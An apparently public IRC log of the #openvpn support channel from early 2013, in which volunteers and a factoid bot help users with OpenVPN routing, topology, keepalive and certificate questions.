23:07 < Rallias> We have 545.63 gb of guaranteed allocation, 1056.24 gb of burst allocation.
23:07 < Rallias> we don't have the capacity to switch to xen.
23:08 < Rallias> or kvm... altho we've got 10 kvm servers.
23:09 < Rallias> meh, I guess I have to do the openvpn branch office on a host node as opposed to a vps..
23:10 < pekster> Did I miss the part where you indicated a tun/routed setup wasn't going to work?
23:10 < pekster> AFAIK that works fine in OpenVZ as long as the host has loaded and exposed the proper support to guests
23:11 < Rallias> because tun involves more openvpn links and more cpu usage.
23:11 < Rallias> with tap I can have a br1 on the host node and use that with 60 VPS's.
23:12 < Rallias> with tun I have to have 1 openvpn link per vps
23:12 < EugeneKay> Why are you doing a link per VPS
23:12 < EugeneKay> Learn to route
23:13 < Rallias> because otherwise I'd have to use about 36 more public-facing IP's.
23:14 < EugeneKay> For.... what?
23:14 < EugeneKay> Are you trying to 1:1 NAT over VPN or something silly?
23:14 < Rallias> no, I'm trying to expose 172.16 IP's to the VPS's with only equipment I own.
23:14 < EugeneKay> Ok, so do that
23:15 < Rallias> which is what I'm trying to do.
23:15 < EugeneKay> !route
23:15 <@vpnHelper> "route" is (#1) http://www.secure-computing.net/wiki/index.php/OpenVPN/Routing or https://community.openvpn.net/openvpn/wiki/RoutedLans (same page mirrored) if you have lans behind openvpn, read it DONT SKIM IT or (#2) READ IT DONT SKIM IT! or (#3) See !tcpip for more info about a more basic networking guide or (#4) See !serverlan or !clientlan for steps and troubleshooting flowcharts for LANs
23:15 <@vpnHelper> behind the server or client
23:15 < Rallias> The only way to do that though with openvz without flooding the datacenter's arp tables with 172.16's (which they've said no to) is using veth
23:15 < EugeneKay> Oh, you don't have a private network.
23:15 < Rallias> no
23:16 < Rallias> well... per physical node...
23:16 < pekster> OpenVPN plays great in a subnet or point-to-point setup on Linux; no need to give anything a public IP unless it actually needs/has one
23:16 < pekster> (both of which are topology modes you can use with tun)
23:16 < pekster> !topology
23:16 <@vpnHelper> "topology" is (#1) it is possible to avoid the !/30 behavior if you use 2.1+ with the option: topology subnet This will end up being default in later versions. or (#2) Clients will receive addresses ending in .2, .3, .4, etc, instead of being divided into 2-host subnets. or (#3) See http://osdir.com/ml/network.openvpn.devel/2005-09/msg00020.html for more history on this.
23:17 < EugeneKay> In my colo I have a small on-link subnet(/29) with two machines connected to it, and then a larger(/26) one routed to a single IP, which I then expose to my vhosts etc on the back-end
23:17 < EugeneKay> I also have private subnets on that back-end
23:18 < EugeneKay> Total cost is an extra GbE on the gateway machine and a gigabit switch
23:18 -!- Rallias [~rallias@unaffiliated/gasseus] has left #openvpn ["Ok, whatever, I get that what I'm saying sounds absurd so I'm going to leave before I get into a shouting match."]
23:18 < pekster> Ragequits after you feed info that might help
23:18 < pekster> Fun times
23:18 < EugeneKay> Oh, he left?
23:18 < EugeneKay> Tardbucket.
23:19 < pekster> I have a feeling either your suggestion might have helped, or the realization that you don't need to eat a /30 in routed mode might have been the point of contention
23:20 < EugeneKay> There's not much money in the OpenVZ hosting market - it's an eternal race to the bottom. I'm guessing he wasn't the brightest sysadmin ;-)
23:21 -!- ploo [~lbz@c-71-196-252-82.hsd1.co.comcast.net] has left #openvpn []
23:21 < pekster> You know your company is in trouble when you end up ragequitting a volunteer IRC support channel without getting what you want :P
23:22 < EugeneKay> Hehehe
23:26 -!- krphop_ [~krphop@74.82.160.100] has joined #openvpn
23:32 -!- krphop [~krphop@watch.out.the.feds.are.rightbehind.us] has quit [Ping timeout: 248 seconds]
23:32 -!- C-S-B [~C-S-B@host86-171-238-234.range86-171.btcentralplus.com] has quit [Ping timeout: 248 seconds]
23:32 -!- C_S_B [~C-S-B@craigsblackie.broker.freenet6.net] has joined #openvpn
23:32 -!- C_S_B is now known as C-S-B
--- Day changed Fri Mar 01 2013
00:09 -!- tyteen4a03 [tyteen4a03@69.50.229.69] has quit [Ping timeout: 272 seconds]
00:22 -!- tyteen4a03 [tyteen4a03@69.50.229.69] has joined #openvpn
00:30 -!- tyteen4a03 [tyteen4a03@69.50.229.69] has quit [Ping timeout: 245 seconds]
00:32 -!- tyteen4a03 [tyteen4a03@69.50.229.69] has joined #openvpn
00:37 -!- neilhwatson [~neilhwats@72.138.34.70] has quit [Ping timeout: 245 seconds]
00:47 -!- Visitorer [~Visitorer@unaffiliated/visitorer] has joined #openvpn
01:09 < Visitorer> This config : http://pastebin.com/ws59czK3 Server is on OS X.7, client on OS X.8, both have ports forwarded, both can see each other's iTunes library, but none can ping each other
01:09 < Visitorer> both have firewalls down
01:40 -!- mikkel [~mikkel@80.71.132.15] has joined #openvpn
01:51 -!- xtz [xtz@DeathStar.Techn0.eu] has joined #openvpn
02:01 -!- mongoman [~mongoman@200.46.98.147] has quit [Ping timeout: 245 seconds]
02:09 -!- mattock_afk is now known as mattock
02:15 -!- mongoman [~mongoman@200.46.98.147] has joined #openvpn
02:17 -!- brute11k [~brute@89.249.235.13] has quit [Read error: Connection reset by peer]
02:18 -!- Immatix [~Immatix@cpe-24-33-68-69.cinci.res.rr.com] has joined #openvpn
02:21 < Immatix> I have a layer 2 OpenVPN tunnel between two hosts, with tap interfaces on either end. On one end, the tap interface is bridged to a physical Ethernet interface and connected to a local network. On the other end, it's just a virtual tap interface. From the remote system, I can ping the address of the bridge, but yet I can't reach any of the hosts connected to the physical network. Am I missing something
02:21 < Immatix> obvious?
02:25 -!- mongoman [~mongoman@200.46.98.147] has quit [Ping timeout: 245 seconds]
02:26 -!- mongoman [~mongoman@200.46.98.147] has joined #openvpn
02:30 -!- simpelsimon [~smalessa@91-66-249-214-dynip.superkabel.de] has joined #openvpn
02:35 -!- odoacre [~antonio@64.235.48.199] has quit [Ping timeout: 248 seconds]
02:35 -!- odoacre [~antonio@64.235.48.199] has joined #openvpn
02:42 < Immatix> things seem to be getting dropped in the iptables FORWARD table of all places
02:44 -!- dpecka [~dpecka@193.165.171.107] has left #openvpn []
02:46 < Immatix> iptables physdev module seems to be the solution
02:54 -!- |Mike| [mike@2001:0:53aa:64c:28ac:7181:2b66:b9f1] has quit [Ping timeout: 245 seconds]
02:58 -!- md_5 [md_5@mcdevs/trusted/md-5] has quit [Quit: ZNC - http://znc.in]
02:59 -!- md_5 [md_5@mcdevs/trusted/md-5] has joined #openvpn
03:13 -!- zz_AsadH is now known as AsadH
03:20 -!- dazo_afk is now known as dazo
03:21 -!- kyrix [~ashley@85-126-76-82.work.xdsl-line.inode.at] has joined #openvpn
03:21 -!- ScriptFanix [vincent@Hanaman.riquer.fr] has quit [Ping timeout: 276 seconds]
03:28 -!- ScriptFanix [vincent@Hanaman.riquer.fr] has joined #openvpn
03:35 -!- Immatix [~Immatix@cpe-24-33-68-69.cinci.res.rr.com] has quit [Quit: WeeChat 0.3.7]
03:37 -!- TommehM [~TomM@unaffiliated/tommehm] has quit [Excess Flood]
03:46 -!- bamalam [bamalam@80.243.180.121] has joined #openvpn
03:48 -!- TommehM [~TomM@unaffiliated/tommehm] has joined #openvpn
04:02 -!- ade_b [~Ade@redhat/adeb] has joined #openvpn
04:06 < bamalam> why does openvpn supercede ident2 and give out a real username?
04:06 -!- pwrcycle [~pwrcycle@unaffiliated/pwrcycle] has quit [Ping timeout: 255 seconds]
04:07 < bamalam> in debian/sid BTW
04:08 < bamalam> it did not in lenny, I missed squeeze
04:12 < bamalam> in.ident2[27639]: sent reply `bamalam' to query 38.229.70.20 (34595, 6667), uid = 1000
04:12 < bamalam> btw ident2 is launched _y for user configurable ident
04:12 < bamalam> *-y
04:13 -!- pwrcycle [~pwrcycle@173.214.160.92] has joined #openvpn
04:14 -!- ade_b [~Ade@redhat/adeb] has quit [Ping timeout: 260 seconds]
04:14 < bamalam> without openvpn connected and running, it sends out whatever ident I choose
04:17 <@plaisthos> openvpn has nothing to do with ident
04:18 < bamalam> fair enough, why does it work as expected and configured without openvpn?
04:18 < bamalam> i would have thought the same myself
04:29 <@plaisthos> no idea depends on your identd
04:36 -!- p3rror [~mezgani@41.250.238.203] has joined #openvpn
04:39 -!- simpelsimon [~smalessa@91-66-249-214-dynip.superkabel.de] has left #openvpn []
04:44 -!- marksaitis [~marksaiti@81.101.81.114] has joined #openvpn
04:49 < Visitorer> This config : http://pastebin.com/ws59czK3 Server is on OS X.7, client on OS X.8, both have ports forwarded, both have firewalls down, both can see each other's iTunes library, but none can ping each other
04:50 < Visitorer> wait, I just realized that we may have been connected through hamachi, so maybe we wouldn't have seen each other's iTunes library
04:55 < Visitorer> I edited the pastebin to include logs
04:55 < kisom> Visitorer: Your paste is private.
04:55 < Visitorer> oh.. oops
04:56 < Visitorer> http://pastebin.com/7rvRbivz
04:56 < Visitorer> I didn't include the part of the log where the server starts though, should I include it?
04:57 < Visitorer> edited the paste to include it
04:58 < kisom> ...did you edit the log? The time stamp goes backwards in time at some point.
04:58 < Visitorer> yeah it's weird but no I didn't edit it
04:58 < kisom> Row 55 for example.
04:59 < kisom> OK, you should tcpdump to see what's happening.
04:59 < kisom> Is either peer within china?
05:00 < Visitorer> nope
05:00 < Visitorer> will do.. I can't do that right now though since my friend is offline
05:00 < Visitorer> would it help if I changed the verbosity of the server?
05:00 < kisom> Probably.
05:01 < kisom> On the other hand
05:01 < kisom> I see a TLS: tls_process: killed expiring key
05:01 < Visitorer> hmmm...
05:01 -!- marksaitis [~marksaiti@81.101.81.114] has quit [Remote host closed the connection]
05:02 < kisom> Does the tunnel work for an hour or so?
05:03 < Visitorer> actually, yes. It seems to redo the same thing every hour
05:03 < kisom> Add a --keepalive to the server side and pull settings from the client.
05:04 < Visitorer> I'm not launching it from commandline, unfortunately
05:05 < kisom> So add it in the config.
05:05 < Visitorer> the server already has "keepalive 10 120", are you talking about something else?
05:05 < kisom> Oh yeah, sorry, I missed it
05:06 < kisom> I think the client side logs would be more describing.
05:09 < Visitorer> I will check with my friend "tomorrow"
05:14 < Rienzilla> hmm
05:14 < Rienzilla> can openvpn push a route with a non-default metric?
05:14 < Rienzilla> ah yes
05:14 < Rienzilla> it can :)
05:25 < kisom> Visitorer: You don't specify an IP address on the client side, btw.
05:25 < kisom> Visitorer: Neither do you pull options from the server
05:25 < kisom> I'm not 100% sure that the IP address needs to be pulled tho
05:25 < kisom> But having the pull option on the client side is generally a good idea imo
05:27 -!- Sidewinder [~de@unaffiliated/sidewinder] has joined #openvpn
05:27 < kisom> Visitorer: Read the --pull directive in the manual. It explains your issue.
05:31 -!- marksaitis [~marksaiti@81.101.81.114] has joined #openvpn
05:36 < Rienzilla> hmz
05:39 < Rienzilla> Ok. I have a number of mobile offices (trucks). They are connected to the internet using a small embedded box containing a 3g-device which acts as a router for the machines in the truck. The embedded box connects to an openvpn server (tun), and routes all traffic through the tunnel with redirect-gateway...
05:40 < Rienzilla> Now, the embedded box also has a wifi interface, which is supposed to supply connectivity at some places (where the 3g coverage is poor). I would like the packets to the vpn endpoint to go through the wifi interface as soon as it's up
05:41 -!- gitsu-sa [~gtu@unaffiliated/gitsu-sa] has joined #openvpn
05:41 < Rienzilla> usually I would do this by setting a high metric on the routes over the 3g, and add lower metric routes to the same destination over the wifi link as soon as it comes up
05:41 < gitsu-sa> hey :) in a small lan, what would you use, tcp or udp?
05:41 < Rienzilla> gitsu-sa: for openvpn, if you can use udp, use udp
05:42 < gitsu-sa> Rienzilla: uhm?
05:42 < gitsu-sa> sure i can x_x
05:42 < Rienzilla> ok
05:42 < Rienzilla> use udp then :)
05:42 < EugeneKay> I remember a patch to make openvpn work over ICMP
05:42 < EugeneKay> That was a riot.
05:42 < gitsu-sa> w..why? D:
05:43 < Rienzilla> because sending tcp over tcp is bad
05:44 < Rienzilla> the protocols that are used on top of the vpn will take care of data loss etc when needed, so openvpn doesn't need to
05:44 < Rienzilla> ....but my question to the channel: can I make openvpn add routes with redirect-gateway, with a higher metric?
05:47 < gitsu-sa> Rienzilla: can I use udp for long distance connections too?
05:47 < gitsu-sa> on the other face of the world, for example
05:50 -!- gitsu-sa [~gtu@unaffiliated/gitsu-sa] has quit [Quit: leaving]
05:51 < kisom> And openvpn over TCP is currently broken, too ;)
05:51 < Rienzilla> .....yes? :)
05:53 -!- brute11k [~brute@89.249.235.13] has joined #openvpn
06:01 -!- kyrix [~ashley@85-126-76-82.work.xdsl-line.inode.at] has quit [Quit: Ex-Chat]
06:02 -!- kyrix [~ashley@85-126-76-82.work.xdsl-line.inode.at] has joined #openvpn
06:13 -!- ade_b [Ade@nat/redhat/x-tiojihvfdggsxoan] has joined #openvpn
06:13 -!- ade_b [Ade@nat/redhat/x-tiojihvfdggsxoan] has quit [Changing host]
06:13 -!- ade_b [Ade@redhat/adeb] has joined #openvpn
06:44 -!- dxtr [~dxtr@unaffiliated/dxtr] has quit [Ping timeout: 256 seconds]
06:45 -!- dxtr [~dxtr@unaffiliated/dxtr] has joined #openvpn
06:46 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has quit [Ping timeout: 264 seconds]
06:49 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has joined #openvpn
07:02 -!- kyrix [~ashley@85-126-76-82.work.xdsl-line.inode.at] has quit [Read error: Operation timed out]
07:07 -!- bamalam [bamalam@80.243.180.121] has quit [Ping timeout: 245 seconds]
07:15 -!- kobolduk [~kobolduk@office.prolocation.net] has joined #openvpn
07:16 -!- kyrix [~ashley@85.126.76.82] has joined #openvpn
07:31 < sejo> how can I know what name my client has (to put in ccd folder)
07:31 < sejo> is that the NAME of the csr or the cn?
07:42 < kisom> It's the cn
07:42 < kisom> It's all in the manual.
07:46 <@dazo> sejo: openssl x509 -noout -subject -in $CERTFILE
07:46 < sejo> thanks davo
07:47 < sejo> dazo
07:47 < sejo> now to figure out routing
07:47 < sejo> this is fun
07:47 <@dazo> !tcpip
07:47 <@vpnHelper> "tcpip" is http://www.redbooks.ibm.com/redbooks/pdfs/gg243376.pdf See chapter 3.1 for useful basic TCP/IP networking knowledge you should probably know
07:59 -!- odoacre [~antonio@64.235.48.199] has quit [Read error: Connection reset by peer]
08:07 -!- brute11k [~brute@89.249.235.13] has quit [Read error: Connection reset by peer]
08:10 -!- dxtr [~dxtr@unaffiliated/dxtr] has quit [Ping timeout: 256 seconds]
08:12 -!- dxtr [~dxtr@unaffiliated/dxtr] has joined #openvpn
08:14 -!- odoacre [~antonio@64.235.48.199] has joined #openvpn
08:17 -!- brute11k [~brute@89.249.235.13] has joined #openvpn
08:22 -!- Eagleman [~Eagleman@546BCD9F.cm-12-4d.dynamic.ziggo.nl] has joined #openvpn
08:30 -!- speed_racer8 [~speed_rac@98.196.168.201] has quit [Ping timeout: 245 seconds]
08:36 -!- greyeax [~grey@cpe-108-185-215-179.socal.res.rr.com] has quit [Read error: Connection reset by peer]
08:37 -!- gladiatr [~sdspence@24.124.15.166] has joined #openvpn
08:37 -!- gladiatr [~sdspence@24.124.15.166] has quit [Changing host]
08:37 -!- gladiatr [~sdspence@openvpn/community/support/gladiatr] has joined #openvpn
08:41 -!- odoacre_ [~antonio@222.126.240.10] has joined #openvpn
08:43 -!- speed_racer8 [~speed_rac@76.30.149.251] has joined #openvpn
08:45 -!- mikkel [~mikkel@80.71.132.15] has quit [Quit: Leaving]
08:45 -!- odoacre [~antonio@64.235.48.199] has quit [Ping timeout: 255 seconds]
08:46 -!- Eagleman [~Eagleman@546BCD9F.cm-12-4d.dynamic.ziggo.nl] has quit [Ping timeout: 255 seconds]
09:00 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has quit [Ping timeout: 276 seconds]
09:00 -!- failshell [~failshell@lpr157.lapresse.ca] has joined #openvpn
09:02 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has joined #openvpn
09:06 -!- Eagleman [~Eagleman@546BCD9F.cm-12-4d.dynamic.ziggo.nl] has joined #openvpn
09:11 < failshell> hello, in a site-to-site setup, i keep getting that message every 5 minutes or so: Inactivity timeout (--ping-restart), restarting
09:11 < failshell> and the tunnel restarts
09:11 < failshell> how do i disable that? i want it to stay up at all times
09:11 < failshell> i'm using a pre-shared key
09:13 < Rienzilla> you can set a keepalive afaik
09:14 < Rienzilla> keepalive 5 30
09:14 < Rienzilla> in config
09:17 < failshell> on the server or client?
09:23 < Rienzilla> I don't think it matters
09:24 < rob0> If using a pre-shared key there is no server nor client. Set options you need in each peer's config.
09:24 < Rienzilla> as long as one of the nodes is sending a ping once in a while it's fine
09:24 < Rienzilla> but both is fine, too I think
09:24 -!- xtz [xtz@DeathStar.Techn0.eu] has quit [Quit: leaving]
09:27 -!- mirco [~mirco@pd95b6029.dip0.t-ipconnect.de] has joined #openvpn
09:28 < failshell> Authenticate/Decrypt packet error: bad packet ID (may be a replay): [ #593 / time = (1362151593) Fri Mar 1 10:26:33 2013 ] -- see the man page entry for --no-replay and --replay-window for more info or silence this warning with --mute-replay-warnings
09:28 < failshell> i get a lot of those too
09:28 < failshell> should i be worried?
09:35 < pekster> failshell: Did you see the notes in the manpage under the --replay-window option that discuss how to use verb 4 to see if you need to increase the replay window?
09:35 -!- ade_b [Ade@redhat/adeb] has quit [Ping timeout: 276 seconds]
09:35 < failshell> well yes, but since i don't really understand the implications
09:36 < failshell> i'm not sure what to do
09:36 < failshell> hence my questions :)
09:37 < pekster> Are you running at verb 4? Do you get any of the "Replay-window backtrack occurred" messages?
09:37 < failshell> i didn't see that message
09:38 < failshell> all i know, is that the tunnel keeps restarting
09:38 < pekster> Inactivity timeout is an unrelated issue to the bad packet ID
09:38 < pekster> You need to mirror your ping/ping-restart options between peers
09:39 < failshell> well, i added keepalive 5 30 on each side
09:39 < failshell> let me set ping/ping-restart
09:40 < pekster> keepalive is just a helper-directive that implies the ping/ping-restart options
09:41 < failshell> can't i just disable the restart instead?
09:41 < failshell> it's a tunnel, it should not restart
09:41 < failshell> ever
09:41 < pekster> (It'll also push them if you use 'mode server' but that doesn't apply to a p2p mode)
09:41 < failshell> unless the connection is down
09:41 -!- kobolduk [~kobolduk@office.prolocation.net] has quit [Quit: ["Textual IRC Client: www.textualapp.com"]]
09:41 -!- Eagleman [~Eagleman@546BCD9F.cm-12-4d.dynamic.ziggo.nl] has quit [Read error: Operation timed out]
09:43 < pekster> failshell: Right, the ping/ping-restart options are the only way to know if the tunnel is up or down. Otherwise it's just a PtP tunnel that doesn't do anything until it has data to send to the peer
09:43 < pekster> I should say the only way for OpenVPN specifically to know if the tunnel is up; you can always write code to do a ping test to the peer, but that's outside OpenVPN's realm
09:44 < failshell> it's been a while since i've set up a tunnel, but as i recall, back in the days with IPsec tunnels, it didn't have that behavior
09:44 -!- Netsplit *.net <-> *.split quits: meepmeep, cosmicfires, mirco, kevinsky
09:45 < pekster> Keepalive packets serve another important role in keeping stateful firewalls open. For example, netfilter (which tracks state on Linux) defaults to a 3 minute timeout for UDP streams
09:45 -!- Netsplit over, joins: meepmeep
09:45 -!- Netsplit over, joins: mirco, kevinsky, cosmicfires
09:50 -!- mongoman [~mongoman@200.46.98.147] has quit [Ping timeout: 245 seconds]
09:59 < sejo> having 2 entries in the ccd one saying iroute 192.168.122.64 255.255.255.192
09:59 < sejo> and the other iroute 192.168.122.64 255.255.255.192
09:59 < sejo> and the other iroute 192.168.122.128 255.255.255.192 (sorry)
09:59 < sejo> shouldn't that result in routing entries like this: 192.168.122.64 192.168.101.2 255.255.255.192 UG 0 0 0 tun0
09:59 < sejo> 192.168.122.128 192.168.101.3 255.255.255.192 UG 0 0 0 tun0
10:00 < sejo> right now on the openvpn server both redirect to the 192.168.101.2 (which should only receive the 192.168.122.64/26 range)
10:03 < pekster> sejo: iroute is an directive that tells openvpn to internally route traffic for the specified network to the client specified by the ccd file. You still need a normal 'route' statement in the server's config to get the route added to the OS-level routing table
10:03 < pekster> is a*
10:04 < sejo> pekster: I know, I've added those
10:04 < sejo> in the server.conf
10:04 -!- Eagleman [~Eagleman@546BCD9F.cm-12-4d.dynamic.ziggo.nl] has joined #openvpn
10:04 < pekster> So, what's the issue. You asked if it results in system routing entries, and iroute does not; route is used for that instead.
10:06 < sejo> pekster: wait. push "route 192.168.122.0 255.255.255.0" will push the route to the clients
10:06 -!- gffa [~unknown@unaffiliated/gffa] has joined #openvpn
10:07 < sejo> route 192.168.122.64 255.255.255.192 will add it to the server
10:07 < pekster> Yup, although if you have iroutes for a /26 instead you should include the smaller routes, otherwise it'll also get pushed to the client owning the iroute. Normally openvpn will omit pushing a route to a client if it has a matching iroute
10:08 < sejo> ok so I should omit the route?
10:08 < pekster> If you want other clients to get a route, push it :)
10:10 < sejo> well basically the server should route to the correct machine, and on all nodes (and their vm's ) I should be able to contact others
10:10 -!- Kendall1 [~gjones@173-165-28-227-Illinois.hfc.comcastbusiness.net] has joined #openvpn
10:11 < pekster> Right. To do that you use iroute, route, and push "route ..." all at once
10:11 -!- Kendall1 is now known as Kendall
10:13 < sejo> indeed, but is it possible that the vm's ip's aren't learned by the openvpn (as they have no vpn client) so it's not routed by openvpn?
10:13 -!- JesseC [~JesseCWor@wsip-98-175-20-126.br.br.cox.net] has joined #openvpn
10:13 < sejo> I see the learned statements in my log for the nodes
10:15 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has joined #openvpn
10:16 < pekster> !clientlan
10:16 <@vpnHelper> "clientlan" is (#1) for a lan behind a client, the client must have ip forwarding enabled (!ipforward), the server needs a route to the lan, the server needs to push a route for the lan to clients, the server needs a ccd (!ccd) file for the client with an iroute (!iroute) entry in it, and the router of the lan the client is on needs a route added to it (!route_outside_openvpn) or (#2) see !route
10:16 <@vpnHelper> for a better explanation or (#3) Handy troubleshooting flowchart: http://ircpimps.org/clientlan.png
10:23 -!- NeoLobster [~NeoLobste@snugglenets.com] has left #openvpn []
10:25 -!- krzee [nobody@openvpn/community/support/krzee] has joined #openvpn
10:25 -!- mode/#openvpn [+o krzee] by ChanServ
10:27 < sejo> pekster: this is the config http://dpaste.com/1009042/
10:29 < sejo> I can't figure it out :/
10:30 < sejo> the forward is set in the firewall
10:30 < pekster> It's not overly wise to use both an ifconfig-pool directive (implied by your server directive on line 9) and ifconfig-push IPs inside that same pool. It "works" so long as your client requests a pool IP
10:31 < pekster> Otherwise that config is fine. (you do have a duplicate directive on lines 14/16)
10:32 < pekster> Actually, you need a different topology from the net30 default; you probably want 'topology subnet' instead
10:33 < sejo> removed the ippool, i'll change the topology
10:34 < pekster> I'm not talking about the ifconfig-pool-persist option; that does something else (and you don't need/want it anyway.)
10:34 < pekster> I'm talking about the implied use of --ifconfig-pool that is expanded from --server. See the latter directive in the manpage for expansion details
10:35 < pekster> Your implied pool range overlaps statically assigned IPs, which is going to break if you ever connect a client that pulls an address from your pool
10:35 < pekster> (I should say could break in specific conditions, fwiw)
10:36 < sejo> true, how do I set the topology? just add topology subnet?
10:38 <@krzee> !man
10:38 <@vpnHelper> "man" is (#1) For man pages, see http://openvpn.net/index.php/open-source/documentation/manuals/ or (#2) the man pages are your friend!
10:38 <@krzee> but yes
10:52 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has joined #openvpn
10:54 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has quit [Client Quit]
10:54 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has joined #openvpn
10:59 -!- raidz_away is now known as raidz
11:06 -!- marksaitis [~marksaiti@81.101.81.114] has quit [Ping timeout: 255 seconds]
11:07 -!- AsadH is now known as zz_AsadH
11:17 -!- speed_racer8 [~speed_rac@76.30.149.251] has quit [Read error: Connection reset by peer]
11:20 -!- MoPac [~MoPac@unaffiliated/mopac] has joined #openvpn
11:21 < MoPac> !welcome
11:21 <@vpnHelper> "welcome" is (#1) Start by stating your goal, such as 'I would like to access the internet over my vpn' || new to IRC? see the link in !ask || we may need !logs and !configs and maybe !interface to help you.
|| See !howto for beginners. || See !route for lans behind openvpn. || !redirect for sending inet traffic through the server. || Also interesting: !man !/30 !topology !iporder !sample !forum 11:21 <@vpnHelper> !wiki !mitm or (#2) Don't use 192.168.1.0/24 or 192.168.0.0/24 (too much potential for conflict) 11:23 < MoPac> I would like to store my client-side cert files in an encfs-encrypted folder in Linux. My problem: openvpn connection succeds when the key/cert files are, e.g., on my desktop. But it fails when they are in a (mounted) encfs folder. I'm not sure if this is a permissions issue, a problem of network manager talking to cryptkeeper, etc 11:24 < pekster> Fails how? OpenVPN doesn't care where your keys are so long as it can read the file at the path provided 11:31 <@krzee> could make it all in-line, then if you read in the config you're done 11:31 <@krzee> !inline 11:31 <@vpnHelper> "inline" is (#1) Inline files (e.g. ... are supported since OpenVPN 2.1rc1 and documented in the OpenVPN 2.3 man page (https://community.openvpn.net/openvpn/wiki/Openvpn23ManPage under INLINE FILE SUPPORT) or (#2) https://community.openvpn.net/openvpn/wiki/IOSinline for a writeup that includes how to use inline certs 11:33 -!- brute11k [~brute@89.249.235.13] has quit [Read error: Connection reset by peer] 11:34 < MoPac> I guess I'm a little confused re: the inline certs -- my idea here is that the keys would only be accessible to a user who had entered a password to mount the encfs folder 11:36 < MoPac> pekster: Sorry I missed your message earlier. The network manager status indicator wasn't very forthcoming about the reason for the failure, just that the connection "failed" 11:36 < MoPac> Through trial and error, I determined that the problem was the folder that the cert/key files were in 11:37 < MoPac> Alternately, is there a way to encrypt the client keys in place and have OpenVPN prompt for a password to decrypt them at connect time? 
11:38 <@krzee> !factoids search pass 11:38 <@vpnHelper> 'winpass', '2.1-winpass-script', 'authpass', 'password-only', 'strip-passphrase', 'change-passphrase', 'enable-passwd-save', and 'password' 11:38 <@krzee> !change-passphrase 11:38 <@vpnHelper> "change-passphrase" is see http://openvpn.net/archive/openvpn-users/2005-03/msg00230.html for how to change (or add) a key's passphrase 11:38 <@krzee> MoPac, ^^ 11:38 < MoPac> Ahh, thanks. N00b to openvpn, just trying to finally ditch pptp 11:39 <@krzee> np, good choice 11:40 <@krzee> MoPac, i suggested inline certs cause you could put the entire config in the encrypted dir 11:40 <@krzee> and then whatever is messing things up (dir not being mounted or something) wont even be able to read the config if it cant read the keys 11:41 < MoPac> krzee: I see. That wasn't as intuitive to me because my config is being build by the Ubuntu network manager GUI 11:42 <@krzee> we strongly recommend against that 11:42 <@krzee> !ubuntu 11:42 <@vpnHelper> "ubuntu" is dont use network manager! 11:42 <@krzee> !netman 11:42 <@vpnHelper> "netman" is if you are using network manager for linux to configure your vpn, dont! http://openvpn.net/archive/openvpn-users/2008-01/msg00046.html to read the same thing from the author of the openvpn 2 cookbook on the mail list 11:42 < MoPac> Good to know 11:43 <@krzee> if you want to import a working config to netman after, go for it 11:43 -!- failshell [~failshell@lpr157.lapresse.ca] has quit [Remote host closed the connection] 11:43 <@krzee> but dont start by making your configs with netman 11:43 < MoPac> Is it a security issue, or just a lack of features? 11:43 <@krzee> its a "you wont know why shit doesnt work how you said for it to" 11:44 < MoPac> QED in my case 11:44 -!- JSharpe [~JSharpe@176.227.206.250] has joined #openvpn 11:44 < MoPac> Any other decent GUI out there to build a proper config, or am I going to need to read a manpage and learn the lines? 
11:45 <@krzee> !confgen 11:45 <@vpnHelper> "confgen" is (#1) http://www.doeshosting.com/code/openvpn-confgen.tgz for the bash config generator or (#2) you can use svn co http://www.secure-computing.net/svn/trunk/openvpn-confgen/ or (#3) you must run this in bash 11:45 <@krzee> could use that if you want 11:45 -!- speed_racer8 [~speed_rac@c-76-30-149-251.hsd1.tx.comcast.net] has joined #openvpn 11:45 < MoPac> thanks! 11:45 <@krzee> it may not be exactly what you want, but it'll give you something to start from 11:46 -!- Isenn [~Isenn@linux.linuxtalk.sizeit.se] has joined #openvpn 11:46 -!- Isenn [~Isenn@linux.linuxtalk.sizeit.se] has left #openvpn [] 11:56 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has joined #openvpn 12:12 -!- cosmicfires [~el-brujo@c-50-135-29-248.hsd1.wa.comcast.net] has quit [Quit: bye...] 12:16 -!- master_of_master [~master_of@p4FF242AF.dip.t-dialin.net] has joined #openvpn 12:19 -!- master_o1_master [~master_of@p4FF24C7A.dip.t-dialin.net] has quit [Ping timeout: 240 seconds] 12:20 -!- MoPac [~MoPac@unaffiliated/mopac] has quit [] 12:35 -!- dazo is now known as dazo_afk 12:40 -!- speed_racer8 [~speed_rac@c-76-30-149-251.hsd1.tx.comcast.net] has quit [Ping timeout: 272 seconds] 12:43 -!- krzee [nobody@openvpn/community/support/krzee] has quit [Read error: Connection reset by peer] 12:44 -!- krzee [nobody@hemp.ircpimps.org] has joined #openvpn 12:44 -!- krzee [nobody@hemp.ircpimps.org] has quit [Changing host] 12:44 -!- krzee [nobody@openvpn/community/support/krzee] has joined #openvpn 12:44 -!- mode/#openvpn [+o krzee] by ChanServ 12:49 -!- mirco [~mirco@pd95b6029.dip0.t-ipconnect.de] has quit [Quit: mirco] 12:50 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has quit [Ping timeout: 272 seconds] 12:57 -!- JackWinter [~jack@ppp-256.vo.lu] has quit [Quit: ZNC - http://znc.in] 12:59 -!- JackWinter [~jack@ppp-256.vo.lu] has joined #openvpn 13:07 -!- krphop_ is now known as krphop 13:14 <@krzee> !learn googleauth as 
